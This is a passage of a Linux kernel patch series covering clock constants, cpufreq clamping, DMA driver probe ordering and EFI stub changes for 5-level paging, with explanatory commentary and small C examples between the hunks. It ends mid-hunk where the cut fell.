++#define OSC_CTRL_OSC_FREQ_19_2MHZ (1u<<30)
++#define OSC_CTRL_OSC_FREQ_12MHZ (2u<<30)
++#define OSC_CTRL_OSC_FREQ_26MHZ (3u<<30)
++#define OSC_CTRL_MASK (0x3f2u | OSC_CTRL_OSC_FREQ_MASK)
++
++#define OSC_CTRL_PLL_REF_DIV_MASK	(3u<<28)
++#define OSC_CTRL_PLL_REF_DIV_1		(0u<<28)
++#define OSC_CTRL_PLL_REF_DIV_2		(1u<<28)
++#define OSC_CTRL_PLL_REF_DIV_4		(2u<<28)
+ 
+ #define OSC_FREQ_DET 0x58
+-#define OSC_FREQ_DET_TRIG (1<<31)
++#define OSC_FREQ_DET_TRIG (1u<<31)
+ 
+ #define OSC_FREQ_DET_STATUS 0x5c
+-#define OSC_FREQ_DET_BUSY (1<<31)
+-#define OSC_FREQ_DET_CNT_MASK 0xFFFF
++#define OSC_FREQ_DET_BUSY (1u<<31)
++#define OSC_FREQ_DET_CNT_MASK 0xFFFFu
+ 
+ #define TEGRA20_CLK_PERIPH_BANKS	3
+ 
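
The clk-tegra20 hunk makes the bit-31 constants unsigned: 1 << 31 overflows a 32-bit signed int, which is undefined behaviour, and the negative result sign-extends when widened to a 64-bit value. A runnable illustration of the difference:

    #include <stdio.h>
    #include <stdint.h>

    int main(void)
    {
        /* 1 << 31 shifts into the sign bit of int (UB); as a value it
         * is negative and sign-extends when stored into 64 bits. */
        uint64_t bad  = (uint64_t)(1 << 31);   /* 0xffffffff80000000 */
        uint64_t good = (uint64_t)(1u << 31);  /* 0x0000000080000000 */

        printf("signed:   %#llx\n", (unsigned long long)bad);
        printf("unsigned: %#llx\n", (unsigned long long)good);
        return 0;
    }
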
+diff --git a/drivers/cpufreq/intel_pstate.c b/drivers/cpufreq/intel_pstate.c
+index abdd26f7d04c9..5771f3fc6115d 100644
+--- a/drivers/cpufreq/intel_pstate.c
++++ b/drivers/cpufreq/intel_pstate.c
+@@ -2952,6 +2952,9 @@ static void intel_cpufreq_adjust_perf(unsigned int cpunum,
+ 	if (min_pstate < cpu->min_perf_ratio)
+ 		min_pstate = cpu->min_perf_ratio;
+ 
++	if (min_pstate > cpu->max_perf_ratio)
++		min_pstate = cpu->max_perf_ratio;
++
+ 	max_pstate = min(cap_pstate, cpu->max_perf_ratio);
+ 	if (max_pstate < min_pstate)
+ 		max_pstate = min_pstate;
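
The intel_pstate hunk adds the missing upper clamp: the requested minimum is first raised to the floor, then capped at the ceiling, so the ceiling wins whenever the two conflict. The same clamp in isolation (names illustrative):

    #include <stdio.h>

    /* Raise to the floor first, cap at the ceiling second: applying the
     * ceiling last means it wins if the floor and ceiling conflict. */
    static unsigned int clamp_pstate(unsigned int req, unsigned int lo,
                                     unsigned int hi)
    {
        if (req < lo)
            req = lo;
        if (req > hi)
            req = hi;
        return req;
    }

    int main(void)
    {
        printf("%u\n", clamp_pstate(2, 10, 8));  /* prints 8: cap wins */
        return 0;
    }
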
+diff --git a/drivers/dma/fsl-qdma.c b/drivers/dma/fsl-qdma.c
+index f383f219ed008..7082a5a6814a4 100644
+--- a/drivers/dma/fsl-qdma.c
++++ b/drivers/dma/fsl-qdma.c
+@@ -109,6 +109,7 @@
+ #define FSL_QDMA_CMD_WTHROTL_OFFSET	20
+ #define FSL_QDMA_CMD_DSEN_OFFSET	19
+ #define FSL_QDMA_CMD_LWC_OFFSET		16
++#define FSL_QDMA_CMD_PF			BIT(17)
+ 
+ /* Field definition for Descriptor status */
+ #define QDMA_CCDF_STATUS_RTE		BIT(5)
+@@ -384,7 +385,8 @@ static void fsl_qdma_comp_fill_memcpy(struct fsl_qdma_comp *fsl_comp,
+ 	qdma_csgf_set_f(csgf_dest, len);
+ 	/* Descriptor Buffer */
+ 	cmd = cpu_to_le32(FSL_QDMA_CMD_RWTTYPE <<
+-			  FSL_QDMA_CMD_RWTTYPE_OFFSET);
++			  FSL_QDMA_CMD_RWTTYPE_OFFSET) |
++			  FSL_QDMA_CMD_PF;
+ 	sdf->data = QDMA_SDDF_CMD(cmd);
+ 
+ 	cmd = cpu_to_le32(FSL_QDMA_CMD_RWTTYPE <<
+@@ -1201,10 +1203,6 @@ static int fsl_qdma_probe(struct platform_device *pdev)
+ 	if (!fsl_qdma->queue)
+ 		return -ENOMEM;
+ 
+-	ret = fsl_qdma_irq_init(pdev, fsl_qdma);
+-	if (ret)
+-		return ret;
+-
+ 	fsl_qdma->irq_base = platform_get_irq_byname(pdev, "qdma-queue0");
+ 	if (fsl_qdma->irq_base < 0)
+ 		return fsl_qdma->irq_base;
+@@ -1243,16 +1241,19 @@ static int fsl_qdma_probe(struct platform_device *pdev)
+ 
+ 	platform_set_drvdata(pdev, fsl_qdma);
+ 
+-	ret = dma_async_device_register(&fsl_qdma->dma_dev);
++	ret = fsl_qdma_reg_init(fsl_qdma);
+ 	if (ret) {
+-		dev_err(&pdev->dev,
+-			"Can't register NXP Layerscape qDMA engine.\n");
++		dev_err(&pdev->dev, "Can't Initialize the qDMA engine.\n");
+ 		return ret;
+ 	}
+ 
+-	ret = fsl_qdma_reg_init(fsl_qdma);
++	ret = fsl_qdma_irq_init(pdev, fsl_qdma);
++	if (ret)
++		return ret;
++
++	ret = dma_async_device_register(&fsl_qdma->dma_dev);
+ 	if (ret) {
+-		dev_err(&pdev->dev, "Can't Initialize the qDMA engine.\n");
++		dev_err(&pdev->dev, "Can't register NXP Layerscape qDMA engine.\n");
+ 		return ret;
+ 	}
+ 
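
The fsl-qdma reordering follows the usual probe rule for interrupt-driven devices: bring the hardware into a known state, then install IRQ handlers, and only then register with the framework that lets consumers submit work, so neither a handler nor a user can observe half-initialized state. A condensed sketch of that ordering, with hw_reg_init(), hw_irq_init() and engine_register() as placeholder names rather than the driver's real functions:

    static int example_probe(struct platform_device *pdev)
    {
        int ret;

        ret = hw_reg_init(pdev);       /* 1: quiesce and program hardware */
        if (ret)
            return ret;

        ret = hw_irq_init(pdev);       /* 2: handlers now see sane state */
        if (ret)
            return ret;

        return engine_register(pdev);  /* 3: admit consumers only at end */
    }
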
+diff --git a/drivers/dma/ptdma/ptdma-dmaengine.c b/drivers/dma/ptdma/ptdma-dmaengine.c
+index 1aa65e5de0f3a..f792407348077 100644
+--- a/drivers/dma/ptdma/ptdma-dmaengine.c
++++ b/drivers/dma/ptdma/ptdma-dmaengine.c
+@@ -385,8 +385,6 @@ int pt_dmaengine_register(struct pt_device *pt)
+ 	chan->vc.desc_free = pt_do_cleanup;
+ 	vchan_init(&chan->vc, dma_dev);
+ 
+-	dma_set_mask_and_coherent(pt->dev, DMA_BIT_MASK(64));
+-
+ 	ret = dma_async_device_register(dma_dev);
+ 	if (ret)
+ 		goto err_reg;
+diff --git a/drivers/firmware/efi/capsule-loader.c b/drivers/firmware/efi/capsule-loader.c
+index 3e8d4b51a8140..97bafb5f70389 100644
+--- a/drivers/firmware/efi/capsule-loader.c
++++ b/drivers/firmware/efi/capsule-loader.c
+@@ -292,7 +292,7 @@ static int efi_capsule_open(struct inode *inode, struct file *file)
+ 		return -ENOMEM;
+ 	}
+ 
+-	cap_info->phys = kzalloc(sizeof(void *), GFP_KERNEL);
++	cap_info->phys = kzalloc(sizeof(phys_addr_t), GFP_KERNEL);
+ 	if (!cap_info->phys) {
+ 		kfree(cap_info->pages);
+ 		kfree(cap_info);
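
The capsule-loader fix allocates sizeof(phys_addr_t) instead of sizeof(void *); the two only coincide on 64-bit, and on a 32-bit kernel with 64-bit physical addresses the old code under-allocated. The sizeof(*ptr) idiom avoids the whole class of bug:

    #include <stdlib.h>
    #include <stdint.h>

    typedef uint64_t phys_addr_t;  /* e.g. a 32-bit kernel with PAE */

    int main(void)
    {
        phys_addr_t *phys;

        phys = malloc(sizeof(void *));  /* 4 bytes on ILP32: too small */
        free(phys);

        phys = malloc(sizeof(*phys));   /* always the pointed-to size  */
        free(phys);
        return 0;
    }
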
+diff --git a/drivers/firmware/efi/efi.c b/drivers/firmware/efi/efi.c
+index b7c0e8cc0764f..9077353d1c98d 100644
+--- a/drivers/firmware/efi/efi.c
++++ b/drivers/firmware/efi/efi.c
+@@ -185,8 +185,27 @@ static const struct attribute_group efi_subsys_attr_group = {
+ static struct efivars generic_efivars;
+ static struct efivar_operations generic_ops;
+ 
++static bool generic_ops_supported(void)
++{
++	unsigned long name_size;
++	efi_status_t status;
++	efi_char16_t name;
++	efi_guid_t guid;
++
++	name_size = sizeof(name);
++
++	status = efi.get_next_variable(&name_size, &name, &guid);
++	if (status == EFI_UNSUPPORTED)
++		return false;
++
++	return true;
++}
++
+ static int generic_ops_register(void)
+ {
++	if (!generic_ops_supported())
++		return 0;
++
+ 	generic_ops.get_variable = efi.get_variable;
+ 	generic_ops.get_next_variable = efi.get_next_variable;
+ 	generic_ops.query_variable_store = efi_query_variable_store;
+@@ -200,6 +219,9 @@ static int generic_ops_register(void)
+ 
+ static void generic_ops_unregister(void)
+ {
++	if (!generic_ops.get_variable)
++		return;
++
+ 	efivars_unregister(&generic_efivars);
+ }
+ 
+diff --git a/drivers/firmware/efi/libstub/Makefile b/drivers/firmware/efi/libstub/Makefile
+index b6e1dcb98a64c..473ef18421db0 100644
+--- a/drivers/firmware/efi/libstub/Makefile
++++ b/drivers/firmware/efi/libstub/Makefile
+@@ -84,6 +84,7 @@ lib-$(CONFIG_EFI_GENERIC_STUB)	+= efi-stub.o string.o intrinsics.o systable.o
+ lib-$(CONFIG_ARM)		+= arm32-stub.o
+ lib-$(CONFIG_ARM64)		+= arm64-stub.o smbios.o
+ lib-$(CONFIG_X86)		+= x86-stub.o
++lib-$(CONFIG_X86_64)		+= x86-5lvl.o
+ lib-$(CONFIG_RISCV)		+= riscv-stub.o
+ lib-$(CONFIG_LOONGARCH)		+= loongarch-stub.o
+ 
+diff --git a/drivers/firmware/efi/libstub/alignedmem.c b/drivers/firmware/efi/libstub/alignedmem.c
+index 1de9878ddd3a2..6b83c492c3b82 100644
+--- a/drivers/firmware/efi/libstub/alignedmem.c
++++ b/drivers/firmware/efi/libstub/alignedmem.c
+@@ -22,12 +22,15 @@
+  * Return:	status code
+  */
+ efi_status_t efi_allocate_pages_aligned(unsigned long size, unsigned long *addr,
+-					unsigned long max, unsigned long align)
++					unsigned long max, unsigned long align,
++					int memory_type)
+ {
+ 	efi_physical_addr_t alloc_addr;
+ 	efi_status_t status;
+ 	int slack;
+ 
++	max = min(max, EFI_ALLOC_LIMIT);
++
+ 	if (align < EFI_ALLOC_ALIGN)
+ 		align = EFI_ALLOC_ALIGN;
+ 
+@@ -36,7 +39,7 @@ efi_status_t efi_allocate_pages_aligned(unsigned long size, unsigned long *addr,
+ 	slack = align / EFI_PAGE_SIZE - 1;
+ 
+ 	status = efi_bs_call(allocate_pages, EFI_ALLOCATE_MAX_ADDRESS,
+-			     EFI_LOADER_DATA, size / EFI_PAGE_SIZE + slack,
++			     memory_type, size / EFI_PAGE_SIZE + slack,
+ 			     &alloc_addr);
+ 	if (status != EFI_SUCCESS)
+ 		return status;
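
efi_allocate_pages_aligned() asks the firmware for align / EFI_PAGE_SIZE - 1 extra slack pages because the boot services allocator only guarantees page alignment; the stub then rounds the returned address up and frees the unused head and tail. The arithmetic on its own (the alignment and address values are made up):

    #include <stdio.h>

    #define PAGE_SZ 4096UL

    int main(void)
    {
        unsigned long align = 64 * 1024;            /* requested alignment */
        unsigned long slack = align / PAGE_SZ - 1;  /* extra pages booked  */
        unsigned long raw   = 0x1003000;            /* page-aligned result */
        unsigned long addr  = (raw + align - 1) & ~(align - 1);

        /* pages below addr and above addr + size are freed back */
        printf("slack=%lu pages, aligned addr=%#lx\n", slack, addr);
        return 0;
    }
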
+diff --git a/drivers/firmware/efi/libstub/arm64-stub.c b/drivers/firmware/efi/libstub/arm64-stub.c
+index e2f90566b291a..16f15e36f9a7d 100644
+--- a/drivers/firmware/efi/libstub/arm64-stub.c
++++ b/drivers/firmware/efi/libstub/arm64-stub.c
+@@ -180,7 +180,8 @@ efi_status_t handle_kernel_image(unsigned long *image_addr,
+ 		 * locate the kernel at a randomized offset in physical memory.
+ 		 */
+ 		status = efi_random_alloc(*reserve_size, min_kimg_align,
+-					  reserve_addr, phys_seed);
++					  reserve_addr, phys_seed,
++					  EFI_LOADER_CODE, 0, EFI_ALLOC_LIMIT);
+ 		if (status != EFI_SUCCESS)
+ 			efi_warn("efi_random_alloc() failed: 0x%lx\n", status);
+ 	} else {
+@@ -190,10 +191,11 @@ efi_status_t handle_kernel_image(unsigned long *image_addr,
+ 	if (status != EFI_SUCCESS) {
+ 		if (!check_image_region((u64)_text, kernel_memsize)) {
+ 			efi_err("FIRMWARE BUG: Image BSS overlaps adjacent EFI memory region\n");
+-		} else if (IS_ALIGNED((u64)_text, min_kimg_align)) {
++		} else if (IS_ALIGNED((u64)_text, min_kimg_align) &&
++			   (u64)_end < EFI_ALLOC_LIMIT) {
+ 			/*
+ 			 * Just execute from wherever we were loaded by the
+-			 * UEFI PE/COFF loader if the alignment is suitable.
++			 * UEFI PE/COFF loader if the placement is suitable.
+ 			 */
+ 			*image_addr = (u64)_text;
+ 			*reserve_size = 0;
+@@ -201,7 +203,8 @@ efi_status_t handle_kernel_image(unsigned long *image_addr,
+ 		}
+ 
+ 		status = efi_allocate_pages_aligned(*reserve_size, reserve_addr,
+-						    ULONG_MAX, min_kimg_align);
++						    ULONG_MAX, min_kimg_align,
++						    EFI_LOADER_CODE);
+ 
+ 		if (status != EFI_SUCCESS) {
+ 			efi_err("Failed to relocate kernel\n");
+diff --git a/drivers/firmware/efi/libstub/efi-stub-helper.c b/drivers/firmware/efi/libstub/efi-stub-helper.c
+index 3d9b2469a0dfd..97744822dd951 100644
+--- a/drivers/firmware/efi/libstub/efi-stub-helper.c
++++ b/drivers/firmware/efi/libstub/efi-stub-helper.c
+@@ -216,6 +216,8 @@ efi_status_t efi_parse_options(char const *cmdline)
+ 			efi_loglevel = CONSOLE_LOGLEVEL_QUIET;
+ 		} else if (!strcmp(param, "noinitrd")) {
+ 			efi_noinitrd = true;
++		} else if (IS_ENABLED(CONFIG_X86_64) && !strcmp(param, "no5lvl")) {
++			efi_no5lvl = true;
+ 		} else if (!strcmp(param, "efi") && val) {
+ 			efi_nochunk = parse_option_str(val, "nochunk");
+ 			efi_novamap |= parse_option_str(val, "novamap");
+diff --git a/drivers/firmware/efi/libstub/efistub.h b/drivers/firmware/efi/libstub/efistub.h
+index 970e86e3aab05..6741f3d900c5a 100644
+--- a/drivers/firmware/efi/libstub/efistub.h
++++ b/drivers/firmware/efi/libstub/efistub.h
+@@ -29,6 +29,11 @@
+ #define EFI_ALLOC_ALIGN		EFI_PAGE_SIZE
+ #endif
+ 
++#ifndef EFI_ALLOC_LIMIT
++#define EFI_ALLOC_LIMIT		ULONG_MAX
++#endif
++
++extern bool efi_no5lvl;
+ extern bool efi_nochunk;
+ extern bool efi_nokaslr;
+ extern int efi_loglevel;
+@@ -415,6 +420,26 @@ union efi_dxe_services_table {
+ 	} mixed_mode;
+ };
+ 
++typedef union efi_memory_attribute_protocol efi_memory_attribute_protocol_t;
++
++union efi_memory_attribute_protocol {
++	struct {
++		efi_status_t (__efiapi *get_memory_attributes)(
++			efi_memory_attribute_protocol_t *, efi_physical_addr_t, u64, u64 *);
++
++		efi_status_t (__efiapi *set_memory_attributes)(
++			efi_memory_attribute_protocol_t *, efi_physical_addr_t, u64, u64);
++
++		efi_status_t (__efiapi *clear_memory_attributes)(
++			efi_memory_attribute_protocol_t *, efi_physical_addr_t, u64, u64);
++	};
++	struct {
++		u32 get_memory_attributes;
++		u32 set_memory_attributes;
++		u32 clear_memory_attributes;
++	} mixed_mode;
++};
++
+ typedef union efi_uga_draw_protocol efi_uga_draw_protocol_t;
+ 
+ union efi_uga_draw_protocol {
+@@ -880,7 +905,9 @@ void efi_get_virtmap(efi_memory_desc_t *memory_map, unsigned long map_size,
+ efi_status_t efi_get_random_bytes(unsigned long size, u8 *out);
+ 
+ efi_status_t efi_random_alloc(unsigned long size, unsigned long align,
+-			      unsigned long *addr, unsigned long random_seed);
++			      unsigned long *addr, unsigned long random_seed,
++			      int memory_type, unsigned long alloc_min,
++			      unsigned long alloc_max);
+ 
+ efi_status_t efi_random_get_seed(void);
+ 
+@@ -907,7 +934,8 @@ efi_status_t efi_allocate_pages(unsigned long size, unsigned long *addr,
+ 				unsigned long max);
+ 
+ efi_status_t efi_allocate_pages_aligned(unsigned long size, unsigned long *addr,
+-					unsigned long max, unsigned long align);
++					unsigned long max, unsigned long align,
++					int memory_type);
+ 
+ efi_status_t efi_low_alloc_above(unsigned long size, unsigned long align,
+ 				 unsigned long *addr, unsigned long min);
+diff --git a/drivers/firmware/efi/libstub/mem.c b/drivers/firmware/efi/libstub/mem.c
+index 45841ef55a9f6..4f1fa302234d8 100644
+--- a/drivers/firmware/efi/libstub/mem.c
++++ b/drivers/firmware/efi/libstub/mem.c
+@@ -89,9 +89,12 @@ efi_status_t efi_allocate_pages(unsigned long size, unsigned long *addr,
+ 	efi_physical_addr_t alloc_addr;
+ 	efi_status_t status;
+ 
++	max = min(max, EFI_ALLOC_LIMIT);
++
+ 	if (EFI_ALLOC_ALIGN > EFI_PAGE_SIZE)
+ 		return efi_allocate_pages_aligned(size, addr, max,
+-						  EFI_ALLOC_ALIGN);
++						  EFI_ALLOC_ALIGN,
++						  EFI_LOADER_DATA);
+ 
+ 	alloc_addr = ALIGN_DOWN(max + 1, EFI_ALLOC_ALIGN) - 1;
+ 	status = efi_bs_call(allocate_pages, EFI_ALLOCATE_MAX_ADDRESS,
+diff --git a/drivers/firmware/efi/libstub/randomalloc.c b/drivers/firmware/efi/libstub/randomalloc.c
+index 9fb5869896be7..7ba05719a53ba 100644
+--- a/drivers/firmware/efi/libstub/randomalloc.c
++++ b/drivers/firmware/efi/libstub/randomalloc.c
+@@ -16,7 +16,8 @@
+  */
+ static unsigned long get_entry_num_slots(efi_memory_desc_t *md,
+ 					 unsigned long size,
+-					 unsigned long align_shift)
++					 unsigned long align_shift,
++					 u64 alloc_min, u64 alloc_max)
+ {
+ 	unsigned long align = 1UL << align_shift;
+ 	u64 first_slot, last_slot, region_end;
+@@ -29,11 +30,11 @@ static unsigned long get_entry_num_slots(efi_memory_desc_t *md,
+ 		return 0;
+ 
+ 	region_end = min(md->phys_addr + md->num_pages * EFI_PAGE_SIZE - 1,
+-			 (u64)ULONG_MAX);
++			 alloc_max);
+ 	if (region_end < size)
+ 		return 0;
+ 
+-	first_slot = round_up(md->phys_addr, align);
++	first_slot = round_up(max(md->phys_addr, alloc_min), align);
+ 	last_slot = round_down(region_end - size + 1, align);
+ 
+ 	if (first_slot > last_slot)
+@@ -53,7 +54,10 @@ static unsigned long get_entry_num_slots(efi_memory_desc_t *md,
+ efi_status_t efi_random_alloc(unsigned long size,
+ 			      unsigned long align,
+ 			      unsigned long *addr,
+-			      unsigned long random_seed)
++			      unsigned long random_seed,
++			      int memory_type,
++			      unsigned long alloc_min,
++			      unsigned long alloc_max)
+ {
+ 	unsigned long total_slots = 0, target_slot;
+ 	unsigned long total_mirrored_slots = 0;
+@@ -75,7 +79,8 @@ efi_status_t efi_random_alloc(unsigned long size,
+ 		efi_memory_desc_t *md = (void *)map->map + map_offset;
+ 		unsigned long slots;
+ 
+-		slots = get_entry_num_slots(md, size, ilog2(align));
++		slots = get_entry_num_slots(md, size, ilog2(align), alloc_min,
++					    alloc_max);
+ 		MD_NUM_SLOTS(md) = slots;
+ 		total_slots += slots;
+ 		if (md->attribute & EFI_MEMORY_MORE_RELIABLE)
+@@ -118,7 +123,7 @@ efi_status_t efi_random_alloc(unsigned long size,
+ 		pages = size / EFI_PAGE_SIZE;
+ 
+ 		status = efi_bs_call(allocate_pages, EFI_ALLOCATE_ADDRESS,
+-				     EFI_LOADER_DATA, pages, &target);
++				     memory_type, pages, &target);
+ 		if (status == EFI_SUCCESS)
+ 			*addr = target;
+ 		break;
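
With the new alloc_min/alloc_max parameters, the usable window inside each memory descriptor is the intersection of the region with [alloc_min, alloc_max], and the slot count is the number of align-spaced start addresses whose full allocation still fits. A standalone version of that computation (all values illustrative):

    #include <stdio.h>

    static unsigned long num_slots(unsigned long r_start, unsigned long r_end,
                                   unsigned long lo, unsigned long hi,
                                   unsigned long size, unsigned long align)
    {
        unsigned long end   = r_end < hi ? r_end : hi;      /* inclusive */
        unsigned long base  = r_start > lo ? r_start : lo;
        unsigned long first = (base + align - 1) & ~(align - 1);
        unsigned long last;

        if (end < size)
            return 0;
        last = ((end - size + 1) / align) * align;
        return first > last ? 0 : (last - first) / align + 1;
    }

    int main(void)
    {
        /* a 16 MiB region clipped to a window, 2 MiB allocation */
        printf("%lu slots\n", num_slots(0x1000000, 0x1ffffff,
                                        0x1200000, 0x1efffff,
                                        0x200000, 0x200000));  /* 6 */
        return 0;
    }
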
+diff --git a/drivers/firmware/efi/libstub/x86-5lvl.c b/drivers/firmware/efi/libstub/x86-5lvl.c
+new file mode 100644
+index 0000000000000..479dd445acdcf
+--- /dev/null
++++ b/drivers/firmware/efi/libstub/x86-5lvl.c
+@@ -0,0 +1,95 @@
++// SPDX-License-Identifier: GPL-2.0-only
++#include <linux/efi.h>
++
++#include <asm/boot.h>
++#include <asm/desc.h>
++#include <asm/efi.h>
++
++#include "efistub.h"
++#include "x86-stub.h"
++
++bool efi_no5lvl;
++
++static void (*la57_toggle)(void *cr3);
++
++static const struct desc_struct gdt[] = {
++	[GDT_ENTRY_KERNEL32_CS] = GDT_ENTRY_INIT(0xc09b, 0, 0xfffff),
++	[GDT_ENTRY_KERNEL_CS]   = GDT_ENTRY_INIT(0xa09b, 0, 0xfffff),
++};
++
++/*
++ * Enabling (or disabling) 5 level paging is tricky, because it can only be
++ * done from 32-bit mode with paging disabled. This means not only that the
++ * code itself must be running from 32-bit addressable physical memory, but
++ * also that the root page table must be 32-bit addressable, as programming
++ * a 64-bit value into CR3 when running in 32-bit mode is not supported.
++ */
++efi_status_t efi_setup_5level_paging(void)
++{
++	u8 tmpl_size = (u8 *)&trampoline_ljmp_imm_offset - (u8 *)&trampoline_32bit_src;
++	efi_status_t status;
++	u8 *la57_code;
++
++	if (!efi_is_64bit())
++		return EFI_SUCCESS;
++
++	/* check for 5 level paging support */
++	if (native_cpuid_eax(0) < 7 ||
++	    !(native_cpuid_ecx(7) & (1 << (X86_FEATURE_LA57 & 31))))
++		return EFI_SUCCESS;
++
++	/* allocate some 32-bit addressable memory for code and a page table */
++	status = efi_allocate_pages(2 * PAGE_SIZE, (unsigned long *)&la57_code,
++				    U32_MAX);
++	if (status != EFI_SUCCESS)
++		return status;
++
++	la57_toggle = memcpy(la57_code, trampoline_32bit_src, tmpl_size);
++	memset(la57_code + tmpl_size, 0x90, PAGE_SIZE - tmpl_size);
++
++	/*
++	 * To avoid the need to allocate a 32-bit addressable stack, the
++	 * trampoline uses a LJMP instruction to switch back to long mode.
++	 * LJMP takes an absolute destination address, which needs to be
++	 * fixed up at runtime.
++	 */
++	*(u32 *)&la57_code[trampoline_ljmp_imm_offset] += (unsigned long)la57_code;
++
++	efi_adjust_memory_range_protection((unsigned long)la57_toggle, PAGE_SIZE);
++
++	return EFI_SUCCESS;
++}
++
++void efi_5level_switch(void)
++{
++	bool want_la57 = IS_ENABLED(CONFIG_X86_5LEVEL) && !efi_no5lvl;
++	bool have_la57 = native_read_cr4() & X86_CR4_LA57;
++	bool need_toggle = want_la57 ^ have_la57;
++	u64 *pgt = (void *)la57_toggle + PAGE_SIZE;
++	u64 *cr3 = (u64 *)__native_read_cr3();
++	u64 *new_cr3;
++
++	if (!la57_toggle || !need_toggle)
++		return;
++
++	if (!have_la57) {
++		/*
++		 * 5 level paging will be enabled, so a root level page needs
++		 * to be allocated from the 32-bit addressable physical region,
++		 * with its first entry referring to the existing hierarchy.
++		 */
++		new_cr3 = memset(pgt, 0, PAGE_SIZE);
++		new_cr3[0] = (u64)cr3 | _PAGE_TABLE_NOENC;
++	} else {
++		/* take the new root table pointer from the current entry #0 */
++		new_cr3 = (u64 *)(cr3[0] & PAGE_MASK);
++
++		/* copy the new root table if it is not 32-bit addressable */
++		if ((u64)new_cr3 > U32_MAX)
++			new_cr3 = memcpy(pgt, new_cr3, PAGE_SIZE);
++	}
++
++	native_load_gdt(&(struct desc_ptr){ sizeof(gdt) - 1, (u64)gdt });
++
++	la57_toggle(new_cr3);
++}
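
Because LJMP takes an absolute destination, efi_setup_5level_paging() patches the jump immediate inside the copied trampoline by adding the copy's load address to it. The relocation step in miniature, with made-up template bytes and offset:

    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>

    int main(void)
    {
        /* pretend template: code, then a 32-bit immediate at offset 4 */
        uint8_t tmpl[8] = { 0x90, 0x90, 0x90, 0xea, 0x10, 0x00, 0x00, 0x00 };
        uint8_t copy[8];
        uint32_t imm;
        unsigned long base = 0x00200000;  /* where the copy was placed */

        memcpy(copy, tmpl, sizeof(tmpl));
        memcpy(&imm, &copy[4], sizeof(imm));
        imm += base;                      /* offset becomes absolute */
        memcpy(&copy[4], &imm, sizeof(imm));

        printf("patched target: %#x\n", imm);  /* 0x200010 */
        return 0;
    }
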
+diff --git a/drivers/firmware/efi/libstub/x86-stub.c b/drivers/firmware/efi/libstub/x86-stub.c
+index 4f0152b11a890..784e1b2ae5ccd 100644
+--- a/drivers/firmware/efi/libstub/x86-stub.c
++++ b/drivers/firmware/efi/libstub/x86-stub.c
+@@ -15,16 +15,16 @@
+ #include <asm/setup.h>
+ #include <asm/desc.h>
+ #include <asm/boot.h>
++#include <asm/kaslr.h>
++#include <asm/sev.h>
+ 
+ #include "efistub.h"
+-
+-/* Maximum physical address for 64-bit kernel with 4-level paging */
+-#define MAXMEM_X86_64_4LEVEL (1ull << 46)
++#include "x86-stub.h"
+ 
+ const efi_system_table_t *efi_system_table;
+ const efi_dxe_services_table_t *efi_dxe_table;
+-extern u32 image_offset;
+ static efi_loaded_image_t *image = NULL;
++static efi_memory_attribute_protocol_t *memattr;
+ 
+ static efi_status_t
+ preserve_pci_rom_image(efi_pci_io_protocol_t *pci, struct pci_setup_rom **__rom)
+@@ -212,8 +212,8 @@ static void retrieve_apple_device_properties(struct boot_params *boot_params)
+ 	}
+ }
+ 
+-static void
+-adjust_memory_range_protection(unsigned long start, unsigned long size)
++efi_status_t efi_adjust_memory_range_protection(unsigned long start,
++						unsigned long size)
+ {
+ 	efi_status_t status;
+ 	efi_gcd_memory_space_desc_t desc;
+@@ -221,12 +221,22 @@ adjust_memory_range_protection(unsigned long start, unsigned long size)
+ 	unsigned long rounded_start, rounded_end;
+ 	unsigned long unprotect_start, unprotect_size;
+ 
+-	if (efi_dxe_table == NULL)
+-		return;
+-
+ 	rounded_start = rounddown(start, EFI_PAGE_SIZE);
+ 	rounded_end = roundup(start + size, EFI_PAGE_SIZE);
+ 
++	if (memattr != NULL) {
++		status = efi_call_proto(memattr, clear_memory_attributes,
++					rounded_start,
++					rounded_end - rounded_start,
++					EFI_MEMORY_XP);
++		if (status != EFI_SUCCESS)
++			efi_warn("Failed to clear EFI_MEMORY_XP attribute\n");
++		return status;
++	}
++
++	if (efi_dxe_table == NULL)
++		return EFI_SUCCESS;
++
+ 	/*
+ 	 * Don't modify memory region attributes, they are
+ 	 * already suitable, to lower the possibility to
+ 	 * encounter firmware bugs.
+ 	 */
+ 		status = efi_dxe_call(get_memory_space_descriptor, start, &desc);
+ 
+ 		if (status != EFI_SUCCESS)
+-			return;
++			break;
+ 
+ 		next = desc.base_address + desc.length;
+ 
+@@ -263,69 +273,26 @@ adjust_memory_range_protection(unsigned long start, unsigned long size)
+ 				 unprotect_start,
+ 				 unprotect_start + unprotect_size,
+ 				 status);
++			break;
+ 		}
+ 	}
++	return EFI_SUCCESS;
+ }
+ 
+-/*
+- * Trampoline takes 2 pages and can be loaded in first megabyte of memory
+- * with its end placed between 128k and 640k where BIOS might start.
+- * (see arch/x86/boot/compressed/pgtable_64.c)
+- *
+- * We cannot find exact trampoline placement since memory map
+- * can be modified by UEFI, and it can alter the computed address.
+- */
+-
+-#define TRAMPOLINE_PLACEMENT_BASE ((128 - 8)*1024)
+-#define TRAMPOLINE_PLACEMENT_SIZE (640*1024 - (128 - 8)*1024)
+-
+-void startup_32(struct boot_params *boot_params);
+-
+-static void
+-setup_memory_protection(unsigned long image_base, unsigned long image_size)
++static efi_char16_t *efistub_fw_vendor(void)
+ {
+-	/*
+-	 * Allow execution of possible trampoline used
+-	 * for switching between 4- and 5-level page tables
+-	 * and relocated kernel image.
+-	 */
+-
+-	adjust_memory_range_protection(TRAMPOLINE_PLACEMENT_BASE,
+-				       TRAMPOLINE_PLACEMENT_SIZE);
++	unsigned long vendor = efi_table_attr(efi_system_table, fw_vendor);
+ 
+-#ifdef CONFIG_64BIT
+-	if (image_base != (unsigned long)startup_32)
+-		adjust_memory_range_protection(image_base, image_size);
+-#else
+-	/*
+-	 * Clear protection flags on a whole range of possible
+-	 * addresses used for KASLR. We don't need to do that
+-	 * on x86_64, since KASLR/extraction is performed after
+-	 * dedicated identity page tables are built and we only
+-	 * need to remove possible protection on relocated image
+-	 * itself disregarding further relocations.
+-	 */
+-	adjust_memory_range_protection(LOAD_PHYSICAL_ADDR,
+-				       KERNEL_IMAGE_SIZE - LOAD_PHYSICAL_ADDR);
+-#endif
++	return (efi_char16_t *)vendor;
+ }
+ 
+ static const efi_char16_t apple[] = L"Apple";
+ 
+-static void setup_quirks(struct boot_params *boot_params,
+-			 unsigned long image_base,
+-			 unsigned long image_size)
++static void setup_quirks(struct boot_params *boot_params)
+ {
+-	efi_char16_t *fw_vendor = (efi_char16_t *)(unsigned long)
+-		efi_table_attr(efi_system_table, fw_vendor);
+-
+-	if (!memcmp(fw_vendor, apple, sizeof(apple))) {
